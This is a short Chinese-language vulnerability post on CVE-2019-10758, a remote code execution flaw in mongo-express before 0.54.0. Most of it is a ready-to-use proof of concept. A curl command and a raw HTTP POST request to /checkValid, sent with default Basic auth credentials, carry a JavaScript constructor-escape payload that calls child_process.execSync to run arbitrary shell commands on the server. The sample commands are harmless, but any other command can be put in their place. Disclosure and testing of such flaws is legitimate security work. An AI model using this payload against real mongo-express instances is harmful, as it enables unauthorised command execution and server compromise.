CVE-2019-10758
漏洞描述:漏洞问题出在lib/bson.js中的toBSON()函数中,路由 /checkValid 从外部接收输入,并调用了存在 RCE 漏洞的代码,由此存在被攻击的风险。
影响版本:mongo-express < 0.54.0
参考资料:
POC:
curl 'http://localhost:8081/checkValid' -H 'Authorization: Basic YWRtaW46cGFzcw==' --data 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("/Applications/Calculator.app/Contents/MacOS/Calculator")'
-------------------------------------------
POST /checkValid HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Authorization: Basic YWRtaW46cGFzcw==
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
请登录后查看评论内容